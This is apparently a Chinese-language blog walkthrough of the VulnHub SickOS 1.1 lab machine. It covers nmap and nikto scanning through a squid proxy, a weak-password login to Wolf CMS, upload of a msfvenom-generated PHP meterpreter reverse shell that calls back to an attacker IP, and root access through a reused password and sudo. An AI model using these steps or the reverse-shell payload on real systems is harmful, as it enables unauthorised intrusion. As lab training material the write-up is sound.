download:
https://download.vulnhub.com/sickos/sick0s1.1.7z
环境部署
下载完靶机压缩包后进行解压,将靶机导入vmware中,网络连接方式设为自动桥接
信息收集
主机发现
首先查看靶机的mac地址
nmap -sP 172.16.10.0/24
使用上面的命令进行主机发现
扫描到ip地址为172.16.10.118
端口扫描
nmap -sV -n -p- 172.16.10.118
发现22、3128、8080端口是开放的,但是却没看到熟悉的80端口
先使用nikto进行对3128端口的扫描
发现有robots.txt网络爬虫的文件
但是直接进行访问却无法访问,再回到nmap扫描后的结果进行查看。因为3128端口的服务是http-proxy,是一个代理服务,那就进行手动进行代理的配置
再次进行访问时,是可以成功访问的
访问robots.txt
wolfcms
介绍
Wolf CMS是一种内容管理系统,并且免费。其由PHP编码语言写成。
Wolf CMS 0.8.2以及之前版本中存在文件上传漏洞。攻击者可以滥用上传特性来上传恶意的PHP文件到程序中,最终导致任意远程代码执行。
发现有一个cms的网站
先使用dirb进行目录的扫描
dirb http://172.16.10.118/wolfcms/ -p 172.16.10.118:3128
有这样一些文件,进行访问后都没有什么可用的信息
接着去观察url的规律
发现在进行访问的时候都是使用参数传入来进行访问的,然后就想使用?admin会不会就能访问到后台的登录页面
果然,在访问后就会自动进行跳转
弱口令
尝试使用弱口令进行登录
登录成功
这里有一个创建文件的地方,可以直接写入反弹shell,进行远程代码执行
反弹shell
生成木马文件
msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.10.185 lport=1122 -f raw -o shell.php
将生成后文件内容中的注释符进行删除,并且写入网站中的文件中
点击create new file进行创建新文件
写入后进行保存
访问上面给出的文件路径,在kali中进行监听
拿到shell
提权
发现有一个config.php配置文件
有root用户和密码
发现不是root用户的登录密码
又去登录mysql,进行了查看,猜测是mysql的udf提权,但是进行查询后发现相关的参数没有打开
再去查看/home目录中是否有其他的用户
查看到有sickos用户,查找了很多,发现john@123这个密码是sickos用户的
直接使用sudo su进行提权
拿到root权限
查看flag文件
总结
主要就是有一个需要进行手动配置代理的点是之前没有见过的,但是整体来说难度不大,需要多进行思考。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论